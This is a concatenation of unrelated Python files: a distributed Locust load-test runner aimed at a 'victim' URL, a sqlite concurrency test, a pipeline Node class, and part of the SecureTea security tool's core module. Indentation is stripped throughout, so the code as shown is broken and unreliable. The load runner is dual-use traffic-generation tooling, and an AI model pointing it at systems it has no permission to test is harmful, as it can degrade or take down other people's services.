reqUrl = masterUrl+'stats/requests'
resp = requests.get( reqUrl )
respJson = resp.json()
if 'slaves' in respJson:
workerData = respJson['slaves']
workersFound = len(workerData)
logger.info( '%d workers found', workersFound )
if workersFound >= nWorkersWanted:
break
if time.time() > deadline:
break
except Exception as exc:
logger.warning( 'exception (%s) %s', type(exc), exc )
time.sleep(1)
nGoodWorkers = 0
maxRps = 0
if workersFound:
url = masterUrl+'swarm'
nUsersWanted = nWorkersWanted * usersPerWorker
reqParams = {'locust_count': nUsersWanted,'hatch_rate': hatch_rate }
logger.info( 'swarming, count: %d, rate %.1f', nUsersWanted, hatch_rate )
resp = requests.post( url, data=reqParams )
if (resp.status_code < 200) or (resp.status_code >= 300):
logger.warning( 'error code from server (%s) %s', resp.status_code, resp.text )
logger.info( 'error url "%s"', url )
logger.info( 'monitoring for %d seconds', susTime )
deadline = time.time() + susTime
while time.time() <= deadline:
if g_.signaled:
break
try:
resp = requests.get( masterUrl+'stats/requests' )
respJson = resp.json()
rps = respJson['total_rps']
maxRps = max( maxRps, rps )
if 'slaves' in respJson:
workerData = respJson['slaves']
workersFound = len(workerData)
#logger.info( '%d workers found', workersFound )
nGoodWorkers = 0
nUsers = 0
# loop for each worker, getting actual number of users
for worker in workerData:
if worker['user_count'] > 0: # could check for >= usersPerWorker
nGoodWorkers += 1
nUsers += worker['user_count']
else:
logger.info( '%s %d %s',
worker['state'], worker['user_count'], worker['id'] )
logger.info( '%d workers found, %d working; %d simulated users',
workersFound, nGoodWorkers, nUsers )
except Exception as exc:
logger.warning( 'exception (%s) %s', type(exc), exc )
time.sleep(5)
# print summary
print( '%d of %d workers showed up, %d workers working at the end'
% (workersFound, nWorkersWanted, nGoodWorkers) )
# get final status of workers
resp = requests.get( masterUrl+'stats/requests' )
respJson = resp.json()
if stopWanted:
resp = requests.get( masterUrl+'stop' )
# save final status of workers as json
with open( 'data/locustWorkers.json', 'w' ) as jsonOutFile:
if 'slaves' in respJson:
workerData = respJson['slaves']
else:
workerData = []
json.dump( workerData, jsonOutFile, sort_keys=True, indent=2 )
print( '%d simulated users' % (respJson['user_count']) )
'''
if nReqInstances:
pctGood = 100 * nGoodWorkers / nReqInstances
print( '\n%d out of %d = %.0f%% success rate' % (nGoodWorkers, nReqInstances, pctGood ) )
'''
def executeLoadtest( targetHostUrl, htmlOutFileName='ltStats.html' ):
masterStarted = False
masterFailed = False
masterSpecs = None
loadTestStats = None
workersStarted = False
try:
if not sigtermSignaled():
startPort = args.startPort
maxPort=args.startPort+300
while (not masterStarted) and (not masterFailed):
if startPort >= maxPort:
logger.warning( 'startPort (%d) exceeding maxPort (%d)',
startPort, maxPort )
break
preopened = preopenPorts( startPort, maxPort, nPorts=3 )
reservedPorts = preopened['ports']
sockets = preopened['sockets']
dataPorts = reservedPorts[0:2]
webPort = reservedPorts[2]
for sock in sockets:
preclose( sock )
sockets = []
masterSpecs = startMaster( targetHostUrl, dataPorts, webPort )
if masterSpecs:
proc = masterSpecs['proc']
deadline = time.time() + 30
while time.time() < deadline:
proc.poll() # sets proc.returncode
if proc.returncode != None:
logger.warning( 'master gave returnCode %d', proc.returncode )
if proc.returncode == 98:
logger.info( 'locust tried to bind to a busy port')
# continue outer loop with higher port numbers
startPort += 3
else:
logger.error( 'locust gave an unexpected returnCode %d', proc.returncode )
# will break out of the outer loop
masterFailed = True
break
time.sleep(.5)
if proc.returncode == None:
masterStarted = True
if masterStarted and not sigtermSignaled():
logger.info( 'calling startWorkers' )
startWorkers( targetHostUrl, args.masterHost, dataPorts )
workersStarted = True
if masterStarted and not sigtermSignaled():
#time.sleep(5)
masterUrl = 'http://127.0.0.1:%d' % webPort
conductLoadtest( masterUrl, nWorkersWanted, args.usersPerWorker,
args.startTimeLimit, args.susTime,
stopWanted=True, nReqInstances=nWorkersWanted, rampUpRate=rampUpRate )
if masterStarted and masterSpecs:
time.sleep(5)
stopMaster( masterSpecs )
if workersStarted:
killWorkerProcs()
if masterStarted:
try:
time.sleep( 5 )
loadTestStats = analyzeLtStats.reportStats(dataDirPath, htmlOutFileName)
except Exception as exc:
logger.warning( 'got exception from analyzeLtStats (%s) %s',
type(exc), exc, exc_info=False )
plottingWanted = True
if plottingWanted:
try:
temp = analyzeLtStats.temporallyIntegrateLocustStats(
dataDirPath+'/locustStats.csv' )
analyzeLtStats.plotIntegratedStats( temp,
dataDirPath+'/integratedPerf.png' )
except Exception as exc:
logger.warning( 'got exception from integrating plotting stats (%s) %s',
type(exc), exc, exc_info=False )
# extended plotting using the boss's code
try:
cmd = [
scriptDirPath()+'/plotLocustAnalysis.py',
'--launchedFilePath', launchedJsonFilePath,
'--mapFilePath', scriptDirPath()+'/WorldCountryBoundaries.csv',
'--outDirPath', dataDirPath,
'--statsFilePath', dataDirPath+'/locustStats.csv'
]
plottingRc = subprocess.call( cmd, stdout=sys.stderr, stderr=subprocess.STDOUT )
if plottingRc:
logger.warning( 'plotLocustAnalysis returned RC %d', plottingRc )
except Exception as exc:
logger.warning( 'got exception from extended plotting (%s) %s',
type(exc), exc, exc_info=False )
except KeyboardInterrupt:
logger.warning( '(ctrl-c) received, will shutdown gracefully' )
if workersStarted:
killWorkerProcs()
if masterStarted and masterSpecs:
stopMaster( masterSpecs )
raise
except Exception as exc:
logger.warning( 'an exception occurred (%s); will try to shutdown gracefully', type(exc) )
if workersStarted:
killWorkerProcs()
if masterStarted and masterSpecs:
stopMaster( masterSpecs )
raise
return loadTestStats
if __name__ == "__main__":
# configure logger formatting
logFmt = '%(asctime)s %(levelname)s %(module)s %(funcName)s %(message)s'
logDateFmt = '%Y/%m/%d %H:%M:%S'
formatter = logging.Formatter(fmt=logFmt, datefmt=logDateFmt )
logging.basicConfig(format=logFmt, datefmt=logDateFmt)
ncs.logger.setLevel(logging.INFO)
logger.setLevel(logging.INFO)
logger.debug('the logger is configured')
ap = argparse.ArgumentParser( description=__doc__, fromfile_prefix_chars='@', formatter_class=argparse.ArgumentDefaultsHelpFormatter )
ap.add_argument( 'victimHostUrl', help='url of the host to target as victim' )
ap.add_argument( 'masterHost', help='hostname or ip addr of the Locust master' )
ap.add_argument( '--authToken', required=True, help='the NCS authorization token to use' )
ap.add_argument( '--altTargetHostUrl', help='an alternative target host URL for comparison' )
ap.add_argument( '--filter', help='json to filter instances for launch' )
ap.add_argument( '--launch', type=boolArg, default=True, help='to launch and terminate instances' )
ap.add_argument( '--nWorkers', type=int, default=1, help='the # of worker instances to launch (or zero for all available)' )
ap.add_argument( '--rampUpRate', type=float, default=0, help='# of simulated users to start per second (overall)' )
ap.add_argument( '--sshClientKeyName', help='the name of the uploaded ssh client key to use (default is random)' )
ap.add_argument( '--startPort', type=int, default=30000, help='a starting port number to listen on' )
ap.add_argument( '--targetUris', nargs='*', help='list of URIs to target' )
ap.add_argument( '--usersPerWorker', type=int, default=35, help='# of simulated users per worker' )
ap.add_argument( '--startTimeLimit', type=int, default=30, help='time to wait for startup of workers (in seconds)' )
ap.add_argument( '--susTime', type=int, default=10, help='time to sustain the test after startup (in seconds)' )
ap.add_argument( '--reqMsprMean', type=float, default=1000, help='required ms per response' )
ap.add_argument( '--testId', help='to identify this test' )
args = ap.parse_args()
argsToSave = vars(args).copy()
del argsToSave['authToken']
signal.signal( signal.SIGTERM, sigtermHandler )
#logger.info( '--filter arg <%s>', args.filter )
dataDirPath = 'data'
os.makedirs( dataDirPath, exist_ok=True )
launchedJsonFilePath = 'launched.json'
argsFilePath = os.path.join( dataDirPath, 'runDistributedLoadtest_args.json' )
with open( argsFilePath, 'w' ) as argsFile:
json.dump( argsToSave, argsFile, indent=2 )
xmlReportFilePath = dataDirPath + '/testResults.xml'
if os.path.isfile( xmlReportFilePath ):
try:
# delete old file
os.remove( xmlReportFilePath )
except Exception as exc:
logger.warning( 'exception while deleting old xml report file (%s) %s', type(exc), exc, exc_info=False )
launchWanted = args.launch
rampUpRate = args.rampUpRate
if not rampUpRate:
rampUpRate = args.nWorkers
os.environ['ANSIBLE_CONFIG'] = os.path.join( scriptDirPath(), 'ansible.cfg' )
#logger.info( 'ANSIBLE_CONFIG: %s', os.getenv('ANSIBLE_CONFIG') )
# check whether the victimHost is available
try:
resp = requests.head( args.victimHostUrl )
if (resp.status_code < 200) or (resp.status_code >= 400):
logger.error( 'got response %d from target host %s',
resp.status_code, args.victimHostUrl )
sys.exit(1)
except Exception as exc:
logger.warning( 'could not access target host %s',args.victimHostUrl )
logger.error( 'got exception %s', exc )
sys.exit(1)
# check whether the altTargetHostUrl, if any, is available
if args.altTargetHostUrl:
try:
resp = requests.head( args.altTargetHostUrl )
if (resp.status_code < 200) or (resp.status_code >= 400):
logger.error( 'got response %d from alt target host %s',
resp.status_code, args.altTargetHostUrl )
sys.exit(1)
except Exception as exc:
logger.warning( 'could not access alt target host %s',args.altTargetHostUrl )
logger.error( 'got exception %s', exc )
sys.exit(1)
nWorkersWanted = args.nWorkers
if launchWanted:
        # overwrite the launchedJson file with an empty list, so we won't have problems with stale contents
with open( launchedJsonFilePath, 'w' ) as outFile:
json.dump( [], outFile )
loadTestStats = None
try:
masterSpecs = None
if launchWanted:
nAvail = ncs.getAvailableDeviceCount( args.authToken, filtersJson=args.filter )
if nWorkersWanted > (nAvail + 5):
logger.error( 'not enough devices available (%d requested)', nWorkersWanted )
sys.exit(1)
if nWorkersWanted == 0:
logger.info( '%d devices available to launch', nAvail )
nWorkersWanted = nAvail
if args.sshClientKeyName:
sshClientKeyName = args.sshClientKeyName
else:
keyContents = loadSshPubKey().strip()
#sshClientKeyName = 'loadtest_%s@%s' % (getpass.getuser(), socket.gethostname())
randomPart = str( uuid.uuid4() )[0:13]
#keyContents += ' #' + randomPart
sshClientKeyName = 'loadtest_%s' % (randomPart)
respCode = ncs.uploadSshClientKey( args.authToken, sshClientKeyName, keyContents )
if respCode < 200 or respCode >= 300:
logger.warning( 'ncs.uploadSshClientKey returned %s', respCode )
sys.exit( 'could not upload SSH client key')
#TODO handle error from launchInstances
rc = launchInstances( args.authToken, nWorkersWanted, sshClientKeyName, filtersJson=args.filter )
if rc:
logger.debug( 'launchInstances returned %d', rc )
# delete sshClientKey only if we just uploaded it
if sshClientKeyName != args.sshClientKeyName:
logger.info( 'deleting sshClientKey %s', sshClientKeyName)
ncs.deleteSshClientKey( args.authToken, sshClientKeyName )
if rc:
logger.warning( 'launchInstances returned %d', rc )
wellInstalled = []
if rc == 0 and not sigtermSignaled():
wellInstalled = installPrereqs()
logger.info( 'installPrereqs succeeded on %d instances', len( wellInstalled ))
if len( wellInstalled ):
if args.targetUris:
targetUriFilePath = dataDirPath + '/targetUris.json'
with open( targetUriFilePath, 'w' ) as outFile:
json.dump( args.targetUris, outFile, indent=1 )
#uploadTargetUris( targetUriFilePath )
# do all the steps of the actual loadtest (the first of 2 if doing a comparison)
loadTestStats = executeLoadtest( args.victimHostUrl )
logger.info ( 'loadTestStatsA: %s', loadTestStats )
xml = genXmlReport( testsPass( args, loadTestStats ) )
with open( xmlReportFilePath, 'w' ) as outFile:
outFile.write( xml )
if args.altTargetHostUrl:
# rename output files for the primary target
srcFilePath = os.path.join( dataDirPath, 'ltStats.html' )
if os.path.isfile( srcFilePath ):
os.rename( srcFilePath, os.path.join( dataDirPath, 'ltStats_a.html' ) )
srcFilePath = os.path.join( dataDirPath, 'locustStats.csv' )
if os.path.isfile( srcFilePath ):
os.rename( srcFilePath, os.path.join( dataDirPath, 'locustStats_a.csv' ) )
print() # a blank lne to separate the outputs from the 2 subtests
sys.stdout.flush()
# do all the steps of the second loadtest
loadTestStatsB = executeLoadtest( args.altTargetHostUrl, htmlOutFileName='ltStats_b.html' )
logger.info ( 'loadTestStatsB: %s', loadTestStatsB )
# rename an output file from the second subtest
srcFilePath = os.path.join( dataDirPath, 'locustStats.csv' )
if os.path.isfile( srcFilePath ):
os.rename( srcFilePath, os.path.join( dataDirPath, 'locustStats_b.csv' ) )
# optional code to compare stats
comparison = {}
comparison[ args.victimHostUrl ] = loadTestStats
comparison[ args.altTargetHostUrl ] = loadTestStatsB
comparisonFilePath = os.path.join( dataDirPath, 'comparison.json' )
with open( comparisonFilePath, 'w' ) as comparisonOutFile:
json.dump( comparison, comparisonOutFile, indent=2 )
# compose per-worker comparison table and save it
compDf = analyzeLtStats.compareLocustStatsByWorker( launchedJsonFilePath,
os.path.join( dataDirPath, 'locustStats_a.csv' ),
os.path.join( dataDirPath, 'locustStats_b.csv' )
)
compDf.to_json( dataDirPath+'/compWorkerTable.json', 'table', index=True )
# compose per-area comparison table and save it
compDf = analyzeLtStats.compareLocustStats( launchedJsonFilePath,
os.path.join( dataDirPath, 'locustStats_a.csv' ),
os.path.join( dataDirPath, 'locustStats_b.csv' )
)
compDf.to_json( dataDirPath+'/compAreaTable.json', 'table', index=True )
html = compDf.to_html(
classes=['sortable'], justify='left', float_format=lambda x: '%.1f' % x
)
with open( dataDirPath+'/compAreaTable.htm', 'w', encoding='utf8') as htmlOutFile:
htmlOutFile.write( html )
except KeyboardInterrupt:
logger.warning( '(ctrl-c) received, will shutdown gracefully' )
except SigTerm:
logger.warning( 'unsupported SIGTERM exception raised, may shutdown gracefully' )
if masterSpecs:
logger.info( 'shutting down locust master')
stopMaster( masterSpecs )
except Exception as exc:
logger.error( 'an exception occurred; will try to shutdown gracefully', exc_info=True )
if launchWanted:
# get instances from json file, to see which ones to terminate
launchedInstances = []
with open( launchedJsonFilePath, 'r') as jsonInFile:
try:
launchedInstances = json.load(jsonInFile) # an array
except Exception as exc:
logger.warning( 'could not load json (%s) %s', type(exc), exc )
if len( launchedInstances ):
jobId = launchedInstances[0].get('job')
if jobId:
logger.info( 'calling terminateJobInstances for job "%s"', jobId )
ncs.terminateJobInstances( args.authToken, jobId )
else:
terminateThese( args.authToken, launchedInstances )
# purgeKnownHosts works well only when known_hosts is not hashed
cmd='purgeKnownHosts.py launched.json > /dev/null'
try:
subprocess.check_call( cmd, shell=True )
except Exception as exc:
logger.error( 'purgeKnownHosts threw exception (%s) %s',type(exc), exc )
if loadTestStats and loadTestStats.get('nReqsSatisfied', 0) > 0 and testsPass( args, loadTestStats ):
rc = 0
else:
rc=1
logger.info( 'finished with rc %d', rc)
sys.exit(rc)
|
test_schema.py
|
import os
import random
import time
from tempfile import TemporaryDirectory
from threading import Thread, Barrier
from ...db.schema import SchemaDatabase
def test_db():
assert isinstance(SchemaDatabase.get_default_data_dir(), str)
with TemporaryDirectory() as _data_dir:
db = SchemaDatabase(data_dir=_data_dir)
assert db.get_data_dir() == _data_dir
assert os.path.isfile(db.get_db_file())
assert len(db.execute('SELECT * FROM Media').fetchall()) == 0
def test_db_exclusive_threads():
tx_duration = .01
free_sleep = .001
n_th = 20
n_tx = 10
# expected minimum total duration = n_tx * n_th * tx_duration
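    # (a sketch of the polling exclusive transaction used here appears after this test)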
persistence = 5.
with TemporaryDirectory() as _data_dir:
SchemaDatabase(data_dir=_data_dir).execute(
'PRAGMA busy_timeout = 1') # Should have no effect.
barrier = Barrier(n_th)
def _job():
barrier.wait() # Let's spam sqlite by starting all at once
db = SchemaDatabase(data_dir=_data_dir)
barrier.wait()
for _ in range(n_tx):
poll = tx_duration * (1. + n_tx * n_th * random.random() / persistence)
db.begin_exclusive_transaction(poll=poll)
time.sleep(tx_duration)
db.commit()
time.sleep(free_sleep)
threads = [Thread(target=_job, daemon=True) for _ in range(n_th)]
for th in threads:
th.start()
for th in threads:
th.join()
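# A minimal sketch of the polling behaviour the test above relies on; this is an
# assumption about SchemaDatabase.begin_exclusive_transaction(poll=...), not its
# actual implementation: retry BEGIN EXCLUSIVE until SQLite grants the write lock,
# sleeping `poll` seconds between attempts instead of relying on busy_timeout.
def _begin_exclusive_with_poll(conn, poll=0.01, timeout=30.0):
    import sqlite3
    deadline = time.monotonic() + timeout
    while True:
        try:
            # raises sqlite3.OperationalError while another connection holds the lock
            conn.execute('BEGIN EXCLUSIVE')
            return
        except sqlite3.OperationalError:
            if time.monotonic() >= deadline:
                raise
            time.sleep(poll)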
if __name__ == '__main__':
import logging
logging.basicConfig(level='DEBUG',
format='%(asctime)s %(name)-12s %(levelname)-8s %(message)s',
datefmt='%m-%d %H:%M:%S')
test_db()
test_db_exclusive_threads()
|
node.py
|
import queue
from loguru import logger
import threading
import time
import enum
import collections
class Node:
"""The elementary node to build up computational graph/pipeline
"""
Pack = collections.namedtuple(
"Package", "values signal context src")
class Status(enum.Enum):
"""Operator Status codes."""
OFF = enum.auto()
ON = enum.auto()
START = enum.auto()
RUN = enum.auto()
STOP = enum.auto()
class Signal(enum.Enum):
"Operator Signal codes."
STOP = enum.auto()
WAIT = enum.auto()
DATA = enum.auto()
class Type(enum.Enum):
INPUT = enum.auto()
OUTPUT = enum.auto()
PIPE = enum.auto()
def __init__(self, op, t=Type.PIPE, name='default'):
self._name = name
self._input_buffer = queue.Queue()
self._output_buffer = queue.Queue()
self._operator = op
self._produce_thread = None
self._result_thread = None
self._status = Node.Status.ON
self._type = t
def get_name(self):
return self._name
def get_type(self):
return self._type
def toggle(self, status=Status.OFF):
        self._status = status
def get_op(self):
return self._operator
def start(self):
if self._status == Node.Status.OFF:
            logger.warning('Please turn on the operator first')
return
self._status = Node.Status.START
logger.info(f'{self._name} Operator is starting.')
self._produce_thread = threading.Thread(
target=self._produce, name=self._name + '-produce')
self._produce_thread.daemon = True
self._produce_thread.start()
self._result_thread = threading.Thread(
target=self._get_result, name=self._name + '-result'
)
self._result_thread.daemon = True
self._result_thread.start()
while not self._produce_thread.is_alive() or not self._result_thread.is_alive():
time.sleep(0.1)
logger.info(f'{self._name} Operator started.')
def stop(self):
logger.info(f'{self._name} Operator is stopping.')
self._operator.stop()
self._status = Node.Status.STOP
self._produce_thread.join()
self._result_thread.join()
logger.info(f'{self._name} Operator thread stopped.')
with self._input_buffer.mutex:
self._input_buffer.queue.clear()
with self._output_buffer.mutex:
self._output_buffer.queue.clear()
self._status = Node.Status.ON
logger.info(f'{self._name} Operator stopped.')
def consume(self, pack):
if self._type != Node.Type.INPUT:
if pack.signal in [Node.Signal.WAIT, Node.Signal.STOP]:
pass
else:
self._input_buffer.put(pack)
else:
logger.warning('INPUT operator does not support consume method')
def produce(self):
"""A python generator function to get the output of the operator.
Returns:
output of the operator.
"""
try:
data = self._output_buffer.get(timeout=0.1)
yield data
except queue.Empty:
yield Node.Pack(values=None, signal=Node.Signal.WAIT, context={}, src=self._name)
finally:
if self._status == Node.Status.STOP:
return
pass
def get_status(self) -> "Node.Status":
"""Get the status code of the operator.
Returns:
The status code of the operator.
"""
return self._status
def _get_result(self):
while True:
for values, context in self._operator.get_result():
if self._status == Node.Status.STOP:
break
else:
self._output_buffer.put(
Node.Pack(values=values, signal=Node.Signal.DATA,
context=context, src=self._name)
)
if self._status == Node.Status.STOP:
break
else:
pass
self._output_buffer.put(
Node.Pack(values=None, signal=Node.Signal.STOP, context={}, src=self._name))
def _produce_from_input(self):
self._operator.run()
def _produce_from_pipe(self):
src = self._name
while True:
try:
data = self._input_buffer.get(timeout=0.1)
self._operator.run(
data.values, context=data.context, src=data.src)
except queue.Empty:
pass
finally:
if self._status == Node.Status.STOP:
break
self._output_buffer.put(
Node.Pack(values=None, signal=Node.Signal.STOP, context={}, src=src))
def _produce_from_output(self):
while True:
try:
data = self._input_buffer.get(timeout=0.1)
self._operator.run(
data.values, context=data.context, src=data.src)
except queue.Empty:
pass
finally:
if self._status == Node.Status.STOP:
break
self._output_buffer.put(
Node.Pack(values=None, signal=Node.Signal.STOP, context={}, src=self._name))
def _produce(self):
logger.info(f'{self._name} Operator thread started.')
if self._type == Node.Type.INPUT:
self._produce_from_input()
elif self._type == Node.Type.OUTPUT:
self._produce_from_output()
elif self._type == Node.Type.PIPE:
self._produce_from_pipe()
else:
logger.error(f'Unknown type for the operator {self._name}')
logger.info(f'{self._name} Operator thread is stopping.')
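# A minimal usage sketch. _EchoOp is a hypothetical operator invented here purely for
# illustration (any object exposing run/get_result/stop would do); it echoes whatever
# the Node feeds it, showing the consume/produce Pack protocol described above.
class _EchoOp:
    def __init__(self):
        self._pending = queue.Queue()
        self._stopped = False
    def run(self, values=None, context=None, src=None):
        # called from the Node's produce thread for every consumed Pack
        self._pending.put((values, context or {}))
    def get_result(self):
        # generator drained by the Node's result thread
        while not self._stopped:
            try:
                yield self._pending.get(timeout=0.1)
            except queue.Empty:
                continue
    def stop(self):
        self._stopped = True
if __name__ == '__main__':
    node = Node(_EchoOp(), t=Node.Type.PIPE, name='echo')
    node.start()
    node.consume(Node.Pack(values='hello', signal=Node.Signal.DATA, context={}, src='main'))
    # produce() yields WAIT packs until the echoed value becomes available
    while True:
        pack = next(node.produce())
        if pack.signal == Node.Signal.DATA:
            logger.info(f'got {pack.values!r} back from {pack.src}')
            break
    node.stop()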
|
core.py
|
# -*- coding: utf-8 -*-
u"""SecureTea.
Project:
╔═╗┌─┐┌─┐┬ ┬┬─┐┌─┐╔╦╗┌─┐┌─┐
╚═╗├┤ │ │ │├┬┘├┤ ║ ├┤ ├─┤
╚═╝└─┘└─┘└─┘┴└─└─┘ ╩ └─┘┴ ┴
Version: 1.1
Module: SecureTea
"""
# To share mouse gestures
import struct
import sys
import time
import threading
from securetea import configurations
from securetea import logger
from securetea.lib.notifs import secureTeaTwitter
from securetea.lib.notifs.secureTeaTelegram import SecureTeaTelegram
from securetea.lib.notifs import secureTeaSlack
from securetea.lib.notifs.aws import secureTeaAwsSES
from securetea.lib.firewall import secureTeaFirewall
from securetea.lib.notifs import secureTeaTwilio
from securetea.lib.notifs import secureTeaGmail
from securetea.args.arguments import get_args
from securetea.args.args_helper import ArgsHelper
from securetea.lib.firewall.utils import setup_logger
from securetea.lib.security_header import secureTeaHeaders
from securetea.lib.ids import secureTeaIDS
from securetea.lib.log_monitor.system_log import engine
from securetea.lib.log_monitor.server_log.secureTeaServerLog import SecureTeaServerLog
from securetea.lib.auto_server_patcher.secureTeaServerPatcher import SecureTeaAutoServerPatcher
from securetea.lib.web_deface.secureTeaWebDeface import WebDeface
from securetea.lib.antivirus.secureTeaAntiVirus import SecureTeaAntiVirus
from securetea.lib.iot import iot_checker
from securetea.modes import server_mode
from securetea.modes import system_mode
from securetea.modes import iot_mode
pynput_status = True
try:
from pynput import mouse
except Exception as e:
pynput_status = False
class SecureTea(object):
"""SecureTea Class."""
alert_count = 1
def __init__(self):
"""Init SecureTea params.
Args:
None
Raises:
None
Returns:
None
Working:
            Collects the arguments passed and calls the respective module
            for parsing them. Further, creates an object for each requested
            notification medium and starts SecureTea.
"""
modulename = 'Core'
self.cred = {}
args = get_args()
argsHelper = ArgsHelper(args)
args_dict = argsHelper.check_args()
credentials = configurations.SecureTeaConf()
self.cred = args_dict['cred']
self.cred_provided = args_dict['cred_provided']
self.twitter_provided = args_dict['twitter_provided']
self.telegram_provided = args_dict['telegram_provided']
self.twilio_provided = args_dict['twilio_provided']
self.slack_provided = args_dict['slack_provided']
self.aws_ses_provided = args_dict['aws_ses_provided']
self.gmail_provided = args_dict['gmail_provided']
self.firewall_provided = args_dict['firewall_provided']
self.insecure_headers_provided = args_dict['insecure_headers_provided']
self.ids_provided = args_dict['ids_provided']
self.system_log_provided = args_dict['system_log_provided']
self.server_log_provided = args_dict['server_log_provided']
self.auto_server_patcher_provided = args_dict['auto_server_patcher_provided']
self.web_deface_provided = args_dict['web_deface_provided']
self.antivirus_provided = args_dict['antivirus_provided']
self.iot_checker_provided = args_dict['iot_checker_provided']
self.server_mode = args_dict["server_mode"]
self.system_mode = args_dict["system_mode"]
self.iot_mode = args_dict["iot_mode"]
# Initialize logger
self.logger = logger.SecureTeaLogger(
modulename,
self.cred['debug']
)
# Setup logger for utils
setup_logger(debug=self.cred['debug'])
if self.cred_provided:
credentials.save_creds(self.cred)
else:
self.cred = credentials.get_creds(args)
try:
if self.cred['twitter']:
self.twitter_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Twitter configuration parameter not set.",
logtype="error"
)
try:
if self.cred['telegram']:
self.telegram_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Telegram configuration parameter not set.",
logtype="error"
)
try:
if self.cred['twilio']:
self.twilio_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Twilio configuration parameter not set.",
logtype="error"
)
try:
if self.cred['slack']:
self.slack_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Slack configuration parameter not set.",
logtype="error"
)
try:
if self.cred['aws_ses']:
self.aws_ses_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"AWS SES configuration parameter not set.",
logtype="error"
)
try:
if self.cred['gmail']:
self.gmail_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Gmail configuraton parameter not set.",
logtype="error"
)
try:
if self.cred['firewall']:
self.firewall_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Firewall configuraton parameter not set.",
logtype="error"
)
try:
if self.cred['insecure_headers']:
self.insecure_headers_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Insecure headers parameter not set.",
logtype="error"
)
try:
if self.cred['ids']:
self.ids_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Intrusion Detection System (IDS) not set.",
logtype="error"
)
try:
if self.cred['server_log']:
self.server_log_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Server Log configuraton parameter not set.",
logtype="error"
)
try:
if self.cred['auto_server_patcher']:
self.auto_server_patcher_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Auto server patcher configuraton not set.",
logtype="error"
)
try:
if self.cred['web-deface']:
self.web_deface_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"Web Deface Detection configuraton not set.",
logtype="eror"
)
try:
if self.cred['antivirus']:
self.antivirus_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"AntiVirus configuraton not set.",
logtype="error"
)
try:
if self.cred['iot-check']:
self.iot_checker_provided = True
self.cred_provided = True
except KeyError:
self.logger.log(
"IoT Checker configuraton not set.",
logtype="error"
)
if not self.cred:
self.logger.log(
"Configuration not found.",
logtype="error"
)
sys.exit(0)
if not self.cred_provided:
self.logger.log(
"None of the notifications configured. Exiting...",
logtype="error"
)
sys.exit(0)
self.logger.log(
"Intrusion system Initializing",
logtype="info"
)
# Initialize modes at first (Server, System, IoT)
# Check for Server mode
if self.server_mode:
self.logger.log(
"Starting SecureTea in server mode",
logtype="info"
)
# Initialize Server Mode object
self.server_mode_obj = server_mode.ServerMode(cred=self.cred, debug=self.cred["debug"])
self.server_mode_obj.start_server_mode()
            # Avoid spawning duplicate processes for objects the server mode already creates; set their flags to False
self.firewall_provided = False
self.server_log_provided = False
self.antivirus_provided = False
self.web_deface_provided = False
self.system_log_provided = False
self.auto_server_patcher_provided = False
self.ids_provided = False
# Check for System mode
if self.system_mode:
self.logger.log(
"Starting SecureTea in system mode",
logtype="info"
)
# Initialize System Mode object
self.system_mode_obj = system_mode.SystemMode(cred=self.cred, debug=self.cred["debug"])
self.system_mode_obj.start_system_mode()
            # Avoid spawning duplicate processes for objects the system mode already creates; set their flags to False
self.firewall_provided = False
self.antivirus_provided = False
self.system_log_provided = False
self.ids_provided = False
# Check for IoT mode
if self.iot_mode:
self.logger.log(
"Starting SecureTea in IoT mode",
logtype="info"
)
# Initialize IoT Mode object
self.iot_mode_obj = iot_mode.IoTMode(cred=self.cred, debug=self.cred["debug"])
self.iot_mode_obj.start_iot_mode()
            # Avoid spawning duplicate processes for objects the IoT mode already creates; set their flags to False
self.firewall_provided = False
self.ids_provided = False
self.iot_checker_provided = False
if self.twitter_provided:
self.twitter = secureTeaTwitter.SecureTeaTwitter(
self.cred['twitter'],
self.cred['debug']
)
if not self.twitter.enabled:
self.logger.log(
"Twitter notification not configured properly.",
logtype="error"
)
else:
self.twitter.notify("Welcome to SecureTea..!! Initializing System")
if self.telegram_provided:
self.telegram = SecureTeaTelegram(
self.cred['telegram'],
self.cred['debug']
)
if not self.telegram.enabled:
self.logger.log(
"Telegram notification not configured properly.",
logtype="error"
)
else:
self.telegram.notify("Initializing Intrusion System")
if self.twilio_provided:
self.twilio = secureTeaTwilio.SecureTeaTwilio(
self.cred['twilio'],
self.cred['debug']
)
if not self.twilio.enabled:
self.logger.log(
"Twilio not configured properly.",
logtype="error"
)
else:
self.twilio.notify("Welcome to SecureTea..!! Initializing System")
if self.slack_provided:
self.slack = secureTeaSlack.SecureTeaSlack(
self.cred['slack'],
self.cred['debug']
)
if not self.slack.enabled:
self.logger.log(
"Slack not configured properly.",
logtype="error"
)
else:
self.slack.notify("Welcome to SecureTea..!! Initializing System")
if self.aws_ses_provided:
self.aws_ses = secureTeaAwsSES.SecureTeaAwsSES(
self.cred['aws_ses'],
self.cred['debug']
)
if not self.aws_ses.enabled:
self.logger.log(
"AWS SES not configured properly.",
logtype="error"
)
else:
self.aws_ses.notify("Welcome to SecureTea..!! Initializing System")
if self.gmail_provided:
self.gmail_obj = secureTeaGmail.SecureTeaGmail(
cred=self.cred['gmail'],
debug=self.cred['debug']
)
if not self.gmail_obj.enabled:
self.logger.log(
"Gmail not configured properly.",
logtype="error"
)
else:
self.gmail_obj.notify("Welcome to SecureTea..!! Initializing System")
if self.firewall_provided:
try:
if self.cred['firewall']:
firewallObj = secureTeaFirewall.SecureTeaFirewall(cred=self.cred,
debug=self.cred['debug'])
firewallObj.start_firewall()
except KeyError:
self.logger.log(
"Firewall configuration parameter not configured.",
logtype="error"
)
if self.insecure_headers_provided:
try:
if self.cred['insecure_headers']:
url = self.cred['insecure_headers']['url']
insecure_headers_obj = secureTeaHeaders.SecureTeaHeaders(url=url,
debug=self.cred['debug'])
insecure_headers_obj.analyze()
except KeyError:
self.logger.log(
"Insecure headers parameter not configured.",
logtype="error"
)
if self.ids_provided:
try:
